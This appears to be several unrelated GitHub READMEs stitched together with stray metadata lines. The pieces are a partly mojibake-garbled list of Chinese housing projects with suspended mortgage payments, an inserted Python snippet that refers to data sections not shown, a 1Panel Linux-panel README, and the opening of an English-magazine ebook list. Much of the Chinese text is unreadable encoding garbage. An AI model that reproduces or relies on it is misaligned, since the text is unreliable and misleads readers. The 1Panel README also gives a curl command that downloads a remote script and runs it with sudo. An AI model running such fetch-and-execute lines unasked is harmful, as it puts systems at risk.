河南省-郑州市-鑫苑金水观城,<br>
河南省-郑州市-鑫苑名城3号院住宅,<br>
河南省-郑州市-郑西鑫苑名家四期（7月）,<br>
ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้ƒ‘ๅทž้‘ซ่‹‘ๅ›ฝ้™…ๆ–ฐๅŸŽ,<br> ่พฝๅฎ็œ-ๅคง่ฟžๅธ‚-ๅคง่ฟžๅธ‚้‘ซๅˆ›็ง‘ๆŠ€ๅฅๅบทๅฐ้•‡๏ผˆๅŒ…ๆ‹ฌ้‘ซ่‹‘่—้พ™้ฆ–ไป˜ไธ€ๆœŸใ€ไบŒๆœŸ๏ผ‰ </details> <details> <summary><b> ้˜ณๅ…‰100 ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-้˜ณๅ…‰100้˜ฟๅฐ”ๅ‹’๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ้˜ณๅ…‰ๅŸŽ้›†ๅ›ข ใ€9ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ๆธๅŒ—ๅŒบ-้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆไบŒๆœŸ๏ผˆ7ๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ไบ”่ฑกๆพœๅบญๅบœๆฒ่‹‘,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ไบ”่ฑกๆพœๅบญๅบœ่‡ป่‹‘,<br> ๆฒณๅ—็œ-ๅ—้˜ณๅธ‚-้˜ณๅ…‰ๅŸŽไธฝๆ™ฏ่Šฑๅ›ญ,<br> ๆฑŸ่‹็œ-ๅ—้€šๅธ‚-้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆ,<br> ๆฑŸ่‹็œ-่‹ๅทžๅธ‚-้˜ณๅ…‰ๅŸŽๆช€่‹‘,<br> ๅฑฑไธœ็œ-ๆตŽๅ—ๅธ‚-้˜ณๅ…‰ๅŸŽๆช€ๆ‚ฆ,<br> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆ,<br> ๅคฉๆดฅๅธ‚-ๆดฅๅ—ๅŒบ-ๅ››ๅญฃๆ˜ฅๆ™“ </details> <details> <summary><b> ็›ŠๅŽๆˆฟๅœฐไบง ใ€1ใ€‘</b></summary> ่ดตๅทž็œ-่ดต้˜ณๅธ‚-ไธญ็Žฏๅ›ฝ้™…้˜…ๆน– </details> <details> <summary><b> ็ฆนๆดฒ้›†ๅ›ข ใ€1ใ€‘</b></summary> ๅŒ—ไบฌๅธ‚-้€šๅทžๅŒบ-็ฆนๆดฒๆœ—ๅปทๆนพ๏ผˆๆœ—ๅปท้›…่‹‘๏ผ‰ </details> <details> <summary><b> ่ฑซ้ฃž้‡ๅทฅ้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-ๆ–ฐไนกๅธ‚-ๆ–ฐไนกๅธ‚่ฑซ้ฃž็››ไธ–ๅŸŽ้‚ฆ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ่ฟœๆด‹็บขๆ˜Ÿไผไธšๅ‘ๅฑ•ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-่ฟœๆด‹็บขๆ˜Ÿๅคฉๆถฆไธ€ๆœŸ </details> <details> <summary><b> ไบ‘ๅ—ๆพ„ๅพทๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ไบ‘ๅ—็œ-็Ž‰ๆบชๅธ‚-ๆจฑ่Šฑ่ฐท๏ผˆ7ๆœˆ๏ผ‰ </details> <details> <summary><b> ้•ฟๆฒ™ๆถฆๆ€กๅŸŽไนกๅผ€ๅ‘ๅปบ่ฎพๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๅฎไนกๆœชๆฅๆ–น่ˆŸ2ๆœŸ&3ๆœŸ </details> <details> <summary><b> ๆญฃ่ฃ้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆปจๆฑŸๆญฃ่ฃ็ดซ้˜™ๅฐ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ๆญฃ่ฃ็ดซ้˜™ๅณฏ่‘—๏ผˆ็ดซ้˜™ๅฐไธœ่ฅฟๅŒบ๏ผ‰ </details> <details> <summary><b> ๆญฃ้˜ณๅŽฟไธญๅŽŸๅŸŽ็ฝฎไธš้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ฉป้ฉฌๅบ—ๅธ‚-ไธญๅŽŸๅŸŽ </details> <details> <summary><b> ้ƒ‘ๅทž้ป„ๆฒณๅคง่ง‚ๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็€šๆตท่ˆชๅŸŽ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็€šๆตทๆ€ๅฟตๅŸŽ </details> <details> <summary><b> ้ƒ‘ๅทžๆ–ฐๅจ้พ™็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅจ้พ™ๅฐšๅ“13ๅทๆฅผ๏ผˆ10ๆœˆๅบ•ไธ‰ๆœŸ็ƒ‚ๅฐพไธ‰ๅนดๅœ่ดท๏ผ‰ </details> <details> <summary><b> ้ƒ‘ๅทžๆฐธๆ’ๆŽง่‚ก้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆฐธๆ’็†ๆƒณไธ–็•Œไธ‰ๆœŸ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ็ฝฎไฟก้›†ๅ›ข ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-็ฝฎไฟก้€ธ้ƒฝๅŸŽ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ไธญ้ผŽ้›†ๅ›ข ใ€3ใ€‘</b></summary> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ไธœ้ผŽ้›ๅ’Œๅบœ๏ผˆ9ๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ไธญ้ผŽๅ…ฌๅ›ญๅบœ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-็Ž‰ๆž—ๅธ‚-ไธญ้ผŽ็ปฟๅŸŽไธญๅฟƒ </details> <details> <summary><b> ไธญๆตทๅœฐไบง้›†ๅ›ขๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ไธ‡้”ฆ็†™ๅฒธ2ๆœŸ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ไธญไบคๅœฐไบง่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅŒ—ไบฌๅธ‚-ๆœ้˜ณๅŒบ-ไธŠไธœ้ƒก๏ผˆๆพœๆ‚ฆๆ™ฏ่‹‘๏ผ‰ </details> <details> <summary><b> ไธญๆถฆๆŽง่‚ก้›†ๅ›ข๏ผˆไธญๅ›ฝ๏ผ‰ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-ไธญๆถฆ็’ž็Ž‰ๅ…ฌ้ฆ† </details> <details> <summary><b> ไธญๅคฉๅŸŽๆŠ•้›†ๅ›ขไนŒๅฝ“ๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ่ดตๅทž็œ-่ดต้˜ณๅธ‚-ไธญๅคฉยทๅพไนก </details> <details> <summary><b> ไผ—็พŽๆŠ•่ต„้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ไผ—็พŽๅฎšๅˆถๅนฟๅœบ </details> <details> <summary><b> ๆ ชๆดฒ่ฏšๅปบๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-่ฏšๅปบๆช€้ฆ™ๅฑฑ </details> <details> 
<summary><b> 株洲华晨房地产开发有限责任公司 【4】</b></summary>
湖南省-株洲市-华晨格林水岸二三期,<br>
湖南省-株洲市-华晨金水湾三四期,<br>
湖南省-株洲市-华晨神农府,<br>
湖南省-株洲市-华晨神农湾
</details>
<details>
<summary><b> 株洲塔山房地产开发有限公司 【1】</b></summary>
湖南省-株洲市-东成中心1栋
</details>
<details>
<summary><b> 驻马店市景宜置业有限公司 【1】</b></summary>
河南省-驻马店市-遂平县绿地苑
</details>
<details>
<summary><b> 庄和集团 【1】</b></summary>
江西省-萍乡市-庄和中央华府（10月）
</details>

## Other Reported Cases

- 山东-青岛-黄岛融发碧桂园珠山郡: delivery postponed citing the pandemic; at present only a handful of workers are idling on site
- 梁溪本源 (construction essentially halted), 合信城立方 (halted for over a year), 新力翡翠湾, 梁溪官邸 (halted for half a year); see: [#900](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/900)
- 四川省-都江堰市-恒大云锦华庭（9月） (notice letter missing)
- 河北-邢台-皓顺壹号院; see: [#940](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/940)
- [贵州中天未来方舟环球谷C1组团 left unfinished](others/中天未来方舟环球谷C1组团.jpeg): construction has been halted for two years and 中天城投 has been taken over; a group was set up in May to coordinate with owners, so there is probably no formal notice letter (http://sc.house.hexun.com/News/details/id/198910.html). Details: [#828](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/828)
- [Notice of loan cut-off and work stoppage from Evergrande suppliers and small businesses in Hubei](others/湖北省恒大供应商、小微企业断贷停工告知书.png)
- 湖北省恒大科技旅游城 plot 5 is one year overdue for delivery; the government task force promised to deliver 2 buildings by 8/10 and failed to keep its word. Delivery of the whole plot is now estimated for November
- 赣榆区香港城、华中郡府 and others: these projects date back more than ten years, and it is unclear whether the owners' interests were ever resolved, so they are included here as well. Details: [大家来说说赣榆的烂尾楼_赣榆吧_百度贴吧.pdf](others/【图片】大家来说说赣榆的烂尾楼_赣榆吧_百度贴吧.pdf). Source: https://tieba.baidu.com/p/4710142504
- 河南省-商丘市-鸿山美景 [photo](https://user-images.githubusercontent.com/110381329/182118827-41b3e82a-0201-4254-8025-6ee729dcb23f.PNG)
- 河北省-邯郸市-北湖尚水湾 [#65](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/65)
- 河北省-三河市-天洋城双心圆, 水岸花语, 百世金谷产业基地二期: 3 unfinished developments [#110](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/110)
- 湖北省-黄石市-黄石广场: the developer has gone bankrupt! [#134](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/134) [photo 1](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/c798e3a792f58be11a522e1f024777e5cf27c56c/images/%E9%BB%84%E7%9F%B3%E5%B8%82%E9%BB%84%E7%9F%B3%E5%B9%BF%E5%9C%BA%E5%BC%80%E5%8F%91%E5%95%86%E7%A0%B4%E4%BA%A7%E7%83%82%E5%B0%BE%E5%9B%BE%E4%B8%80.png) [photo 2](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/c798e3a792f58be11a522e1f024777e5cf27c56c/images/%E9%BB%84%E7%9F%B3%E5%B8%82%E9%BB%84%E7%9F%B3%E5%B9%BF%E5%9C%BA%E5%BC%80%E5%8F%91%E5%95%86%E7%A0%B4%E4%BA%A7%E7%83%82%E5%B0%BE%E5%9B%BE%E4%BA%8C.png)
- 河北省-保定市-涞水新城华银城人才家园 [#159](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/159)
ๅคฉๆดฅๅธ‚-[ๅ—ๅผ€ๅŒบๅ‡Œๅฎพ่ทฏๅœฐ้“Bๅฃ่ฅฟไพง-่žๅˆ›ๅฎธ้™ข๏ผˆๅŽๅทๅ›ญ๏ผ‰](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/53d4a3fd467974d86d727ff3151132c67b4e8493/images/%E5%8D%97%E5%BC%80%E5%8C%BA%E8%9E%8D%E5%88%9B%E5%AE%B8%E9%99%A2.jpg)๏ผŒ[่ฅฟ้’ๅŒบๆดฅๅŒๅ…ฌ่ทฏไธŽๅญ็‰™ๆกฅไบคๅฃ-่“ๅ…‰้›็ปตๅŠๅฒ›](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/53d4a3fd467974d86d727ff3151132c67b4e8493/images/%E8%A5%BF%E9%9D%92%E5%8C%BA%E9%9B%8D%E7%BB%B5%E5%8D%8A%E5%B2%9B.jpg) ไธคไธช็ƒ‚ๅฐพๆฅผ [#161](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/161) - ๆฒณๅ—็œ-่ฎธๆ˜Œๅธ‚-้“‚ๆ‚ฆๅฑฑ๏ผŒๅšๆž—้ฆ–ๅบœ๏ผŒๆ’ๅคงๆ‚ฆ้พ™ๅฐ 3ไธชๅœๅทฅๆฅผ็›˜ [#234](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/234) - ๆฒณๅ—็œ-ไธ‰้—จๅณกๅธ‚-่ˆช็ง‘ๅŸŽ๏ผŒๅผ€้˜ณ็››ไธ–๏ผŒไธญๆตทๅ›ฝ้™…๏ผŒๆ˜ฅๅคฉๅŸŽ 4ไธช็ƒ‚ๅฐพ้กน็›ฎ [#261](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/261) - ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ดž่ง‚้ฆ–ๅบœ [#262](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/262) - ๆน–ๅŒ—็œ-ๅฎœๆ˜Œๅธ‚-ๅฎœๆ˜Œๅคท้™ตๅŒบๆ’ๅคงๅ้ƒฝไบŒๆœŸ๏ผˆ2021.8ๅœๅทฅ๏ผ‰[#269](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/269) - ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๆฐธ้‘ซๅ“ˆๅผ—ไธญๅฟƒ๏ผˆ9ๆœˆ๏ผ‰๏ผŒ้”ฆ่‰บๆ˜†ๆ˜Žไน‹ๅ…‰๏ผˆ10ๆœˆ๏ผ‰๏ผˆ็ผบๅ‘Š็Ÿฅไนฆ๏ผ‰ [#272](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/272) - ๆน–ๅŒ—็œ-ๅญๆ„Ÿๅธ‚-ไบ‘ๆขฆๅŽฟ่กๆณฝๆ–ฐ้ƒฝ [#274](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/274) - ๆฑŸ่‹็œ-ๆ‰ฌๅทžๅธ‚-ๆฑŸ้ƒฝๅŒบ้‡‘ๅฅฅๆ–‡ๆ˜Œๅ…ฌ้ฆ† ๅผ€ๅ‘ๅ•†็ ดไบง๏ผŒ็›‘็ฎก่ต„้‡‘ๅทฒ็ฉบ๏ผŒๆฅผ็›˜่‡ชๅŽปๅนดๅทฒ็ปๅœๅทฅ [ๅผ€ๅ‘ๅ•†ๅ€บๆƒ็”ณๆŠฅ](https://user-images.githubusercontent.com/38778288/180631681-31d1acb2-a6d5-4650-8ad4-4ddc352a9641.jpeg) - ้‡ๅบ†ๅธ‚-ๅŒ—็ขšๅŒบ-่žๅˆ›ๆ˜ ๆน–ๅ้‡Œ ็ƒ‚ๅฐพๆฅผ็›˜ - ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-็ปฟๅœฐๆŸๆพœๆ™ถ่ˆ(ๆŽจๅนฟๅ:็ปฟๅœฐไบšๆดฒๅ…ฌๅ›ญ) [#292](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/292) [ๅœๅทฅๅ‘Š็Ÿฅ](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/0e560306424c6adfb67f13e12d3f4a3a7c3e06ff/images/%E7%BB%BF%E5%9C%B0%E6%9F%8F%E6%BE%9C%E6%99%B6%E8%88%8D%E5%BB%B6%E6%9C%9F%E4%BA%A4%E4%BB%98%E9%80%9A%E7%9F%A5%E4%B9%A6.jpg) - ๅฎ‰ๅพฝ็œ-ๅˆ่‚ฅๅธ‚-ๆ–ฐ็ซ™ๅŒบๆญฃ่ฃไธญๅฟƒ ็›ฎๅ‰่ฏฅๅฐๅŒบ็š„้…ๅฅ—้กน็›ฎๅทฒ็ป็ƒ‚ๅฐพ๏ผŒไฝๅฎ…ๅทฒ็ปไบคไป˜้ƒจๅˆ† [#320](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/320) [ๅ›พไธ€](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/16f3c43cf767c2b6d3ec2c4c459c6c14e0d00e9b/images/%E5%90%88%E8%82%A5%E6%96%B0%E7%AB%99%E5%8C%BA%E6%AD%A3%E8%8D%A3%E4%B8%AD%E5%BF%83.jpeg) [ๅ›พไบŒ](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/16f3c43cf767c2b6d3ec2c4c459c6c14e0d00e9b/images/%E5%90%88%E8%82%A5%E6%96%B0%E7%AB%99%E5%8C%BA%E6%AD%A3%E8%8D%A3%E4%B8%AD%E5%BF%83%E7%83%82%E5%B0%BE%E6%94%BF%E5%BA%9C%E5%8F%8D%E9%A6%88.jpeg) - ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-็ปฟๅœฐๅคง้ƒฝไผš [#520](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/520) - ๆฑŸ่ฅฟ็œ-ๆŠšๅทžๅธ‚-ไธœไนกๅŒบ็บขๆ˜Ÿ้›…่‹‘ 10ๅนดๆœช่ƒฝๅŠž็†ๆˆฟไบง่ฏ [#565](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/565) - ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ไธญๆตท้”ฆๆฑŸๅŸŽไบ‘็†™ไบŒๆœŸ๏ผŒไบบๅฑ…ๆ™บ่ŸๅŸŽ [#586](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/586) - ้‡ๅบ†ๅธ‚-ๅŒ—็ขšๅŒบ-ๅŒ—็ขšๅˆซๅข…็พค๏ผˆๅฐๅŒบๅๅญ—ไธ่ฎฐๅพ—๏ผŒๅœจ้‡ๅบ†ๅŒ—็ขšๅพˆๅ‡บๅ๏ผ‰ [#692](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/692) - ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-็ปฟๅœฐไผ—ๅฎ‰ๅฎธ็€š้‡Œ๏ผˆๅทฒ็ป“ๆŸ๏ผ‰ [#718](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/718) 
- 陕西省-咸阳市-[融创御河宸院DK6](https://github.com/WeNeedHome/SummaryOfLoanSuspension/blob/ae61f72dd4d54b63c32b1ffa65d78d17fde2c5f8/images/%E9%99%95%E8%A5%BF%E7%9C%81/%E5%92%B8%E9%98%B3%E5%B8%82/%E5%92%B8%E9%98%B3%E8%9E%8D%E5%88%9B%E5%BE%A1%E6%B2%B3%E5%AE%B8%E9%99%A2DK6%E5%85%A8%E4%BD%93%E4%B8%9A%E4%B8%BB%E5%81%9C%E8%B4%A7%E5%91%8A%E7%9F%A5%E4%B9%A6.png) (now concluded) [a "归心家书" update from Dec 2023](https://mp.weixin.qq.com/s/ZX6n0dz5Ali-DzgShoQfBA)
- 广西壮族自治区-南宁市-当代锦园3、5号楼 [#896](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/896)
- 云南省-昆明市-别样幸福城 [#925](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/925)
- 广东省-汕头市-恒大金碧江湾6期 [#993](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/993) [photo](https://user-images.githubusercontent.com/50266660/180631384-35f3a5da-97e8-4dcf-a98a-9ecf66c0823c.jpg)
- 广东省-深圳市-盐田佳兆业御璟佳园广场 [#1003](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/1003)
- 福建省-建瓯市-恒大溪山公馆 [#1062](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/1062)
- 云南省-西双版纳傣族自治州-融创旅游度假区 [#558](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/558)
- 湖北省-襄阳市-融创民发御湖壹号: now unfinished; owners have begun hanging banners at the gate [comment](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/1134#discussioncomment-3452874)
- 河南省-郑州市-金科星澜园 [comment](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/423#discussioncomment-3152066)
- 江苏省-苏州市-恒大悦珑湾: delivery is due at the end of August; owners will suspend repayments if it is not delivered [comment](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/6#discussioncomment-3256616)
- 四川省-成都市-龙泉-幸福东方白桦林 [#1190](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/1190)
- 湖北省-武汉市-江岸区星湖湾 [#1195](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/1195)
- 山西省-太原市-阳光城并州府 [#1200](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/1200)
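## Working with the Structured Data

For readers who want to analyze the dataset rather than browse it, here is a minimal sketch of how the generated JSON files listed under "Structured Data" might be loaded. It is a hypothetical example: the field names (`province`, `city`, `name`) are assumptions inferred from the file descriptions above, not a confirmed schema, so inspect the JSON before relying on them.

```python
import json
from collections import Counter

# Load the flat-format property list (assumed: a JSON array of records).
with open("data/generated/properties-flat.json", encoding="utf-8") as f:
    properties = json.load(f)

# Tally suspended-loan properties per province.
# "province" is an assumed key name; adjust it to the actual schema.
by_province = Counter(p["province"] for p in properties)

for province, count in by_province.most_common(10):
    print(f"{province}: {count}")
```

The same pattern applies to `cities-for-visualization.json`, whose per-city counts and coordinates can feed a map renderer directly.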
ๅ…จๅ›ฝๅ„็œๅธ‚ๅœ่ดท้€š็Ÿฅๆฑ‡ๆ€ป
null
0
137
519
1,080
0
2
1
1Panel-dev/1Panel
<p align="center"><a href="https://1panel.cn"><img src="http://1panel.oss-cn-hangzhou.aliyuncs.com/img/1panel-logo.png" alt="1Panel" width="300" /></a></p> <p align="center"><b>A modern, open-source Linux server operations and management panel</b></p> <p align="center"><a href="https://hellogithub.com/repository/71791baf930149ac9b84e1acf186573f" target="_blank"><img src="https://api.hellogithub.com/v1/widgets/recommend.svg?rid=71791baf930149ac9b84e1acf186573f&claim_uid=p8vB3kP5CMrthiL&theme=dark&theme=neutral" alt="Featured๏ฝœHelloGitHub" style="width: 250px; height: 54px;" width="250" height="54" /></a></p> <p align="center"> <a href="https://www.gnu.org/licenses/gpl-3.0.html"><img src="https://shields.io/github/license/1Panel-dev/1Panel?color=%231890FF" alt="License: GPL v3"></a> <a href="https://app.codacy.com/gh/1Panel-dev/1Panel?utm_source=github.com&utm_medium=referral&utm_content=1Panel-dev/1Panel&utm_campaign=Badge_Grade_Dashboard"><img src="https://app.codacy.com/project/badge/Grade/da67574fd82b473992781d1386b937ef" alt="Codacy"></a> <a href="https://github.com/1Panel-dev/1Panel/releases"><img src="https://img.shields.io/github/v/release/1Panel-dev/1Panel" alt="GitHub release"></a> <a href="https://github.com/1Panel-dev/1Panel"><img src="https://img.shields.io/github/stars/1Panel-dev/1Panel?color=%231890FF&style=flat-square" alt="GitHub Stars"></a> <a href="https://gitee.com/fit2cloud-feizhiyun/1Panel"><img src="https://gitee.com/fit2cloud-feizhiyun/1Panel/badge/star.svg?theme=gvp" alt="Gitee Stars"></a><br> [<a href="docs/README_TW.md">Chinese (Traditional)</a>] | [<a href="docs/README_EN.md">English</a>] | [<a href="docs/README_JP.md">Japanese</a>] </p> [![Watch the video](https://resource.fit2cloud.com/1panel/img/overview_video.png)](https://www.bilibili.com/video/BV1Mt421n7LZ/) ------------------------------ ## What is 1Panel? 1Panel is a new-generation Linux server operations and management panel. - **Efficient management**: easily manage Linux servers through a graphical web interface, with host monitoring, file management, database management, container management, and more; - **Fast website setup**: deep integration with the open-source site-building software WordPress and [Halo](https://github.com/halo-dev/halo/); domain binding, SSL certificate configuration, and similar tasks are handled in one click; - **App store**: a curated catalog of high-quality open-source tools and applications that are easy to install and upgrade; - **Secure and reliable**: applications are managed and deployed as containers, minimizing the exposed vulnerability surface, with firewall and log-audit features included; - **One-click backup**: supports one-click backup and restore; data can be backed up to a variety of cloud storage destinations so it is never lost. ## Quick Start **One-click installation** Run the following command to install 1Panel in one step: ```sh curl -sSL https://resource.fit2cloud.com/1panel/package/quick_start.sh -o quick_start.sh && sudo bash quick_start.sh ``` For offline environments, installing from the [installation package](https://1panel.cn/docs/installation/package_installation/) is recommended. **Learning resources** - [Online documentation](https://1panel.cn/docs/) - [Community forum](https://bbs.fit2cloud.com/c/1p/7) - [How to join the WeChat group?](https://bbs.fit2cloud.com/t/topic/2147) ## Other star projects from FIT2CLOUD - [MaxKB](https://github.com/1Panel-dev/MaxKB/) - an open-source knowledge-base question-answering system based on large language models - [JumpServer](https://github.com/jumpserver/jumpserver/) - a widely used open-source bastion host - [Halo](https://github.com/halo-dev/halo/) - a powerful, easy-to-use open-source website-building tool - [DataEase](https://github.com/dataease/dataease/) - 
ไบบไบบๅฏ็”จ็š„ๅผ€ๆบๆ•ฐๆฎๅฏ่ง†ๅŒ–ๅˆ†ๆžๅทฅๅ…ท - [MeterSphere](https://github.com/metersphere/metersphere/) - ๅผ€ๆบ่‡ชๅŠจๅŒ–ๆต‹่ฏ•ๅนณๅฐ ## License Copyright (c) 2014-2024 [FIT2CLOUD ้ฃž่‡ดไบ‘](https://fit2cloud.com/), All rights reserved. Licensed under The GNU General Public License version 3 (GPLv3) (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at <https://www.gnu.org/licenses/gpl-3.0.html> Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
๐Ÿ”ฅ ๐Ÿ”ฅ ๐Ÿ”ฅ A modern, open-source Linux server operations and management panel.
appstore,database,docker,docker-compose,lamp,lnmp,panel,crontab,docker-container,docker-image
64
67
2,195
2,809
493
16
8
hehonghui/awesome-english-ebooks
# ็ปๆตŽๅญฆไบบใ€็บฝ็บฆๅฎข็ญ‰่‹ฑ่ฏญๅค–ๅˆŠๆ‚ๅฟ—ไธ‹่ฝฝ --------------------- ## ไธ€ใ€ไผ˜่ดจAppๆŽจ่ * <img align="center" src="https://ereader.link/images/ereader.png" width="32px" /> ่‹ฑ้˜…้˜…่ฏปๅ™จ - ่ถ…ๅฅฝ็”จ็š„่‹ฑ่ฏญ้˜…่ฏป็ฅžๅ™จ, <font color="#e3120b">่ฎฉๆ‚จ่ฝปๆพ่ฏปๆ‡‚่‹ฑๆ–‡ๅฐ่ฏดใ€ๅค–ๅˆŠๆ‚ๅฟ—</font>,ๆ”ฏๆŒ็‚นๅ‡ปๆŸฅ่ฏใ€ๅฅๅญ็ฟป่ฏ‘ใ€mdict่‹ฑๆฑ‰-่‹ฑ่‹ฑ่ฏๅ…ธใ€้˜…่ฏป็ฌ”่ฎฐ็ญ‰ๅŠŸ่ƒฝ,[iOS็‰ˆไธ‹่ฝฝ](https://apps.apple.com/cn/app/ereader-%E8%8B%B1%E9%98%85%E9%98%85%E8%AF%BB%E5%99%A8/id1558805880)ใ€[Android็‰ˆไธ‹่ฝฝ](https://www.coolapk.com/apk/283424); --------------------- ## ไบŒใ€ๅ†…ๅฎนๅˆ†็ฑป * [็ปๆตŽๅญฆไบบ - ๅ‘จๅˆŠ, ็‚นๅ‡ป่ฟ™้‡Œไธ‹่ฝฝๆœ€ๆ–ฐไธ€ๆœŸ](01_economist/te_2024.06.22) , ๆฏๅ‘จไบ”ๅไธ€็‚นๆ›ดๆ–ฐ * [็บฝ็บฆๅฎข - ๅ‘จๅˆŠ, ็‚นๅ‡ป่ฟ™้‡Œไธ‹่ฝฝๆœ€ๆ–ฐไธ€ๆœŸ](02_new_yorker/2024.06.24) , ๆฏๅ‘จๅ…ญไธŠๅˆๆ›ดๆ–ฐ * [ๅซๆŠฅ - ๆฏๅ‘จไธคๆœŸ](09_guardian/), ๆฏๅ‘จไธ‰ใ€ๅ‘จๆ—ฅๆ›ดๆ–ฐ * [The Atlantic - ๆœˆๅˆŠ](04_atlantic), ๆฏๆœˆ2ๅทๆ›ดๆ–ฐ * [Wired - ๆœˆๅˆŠ](05_wired), 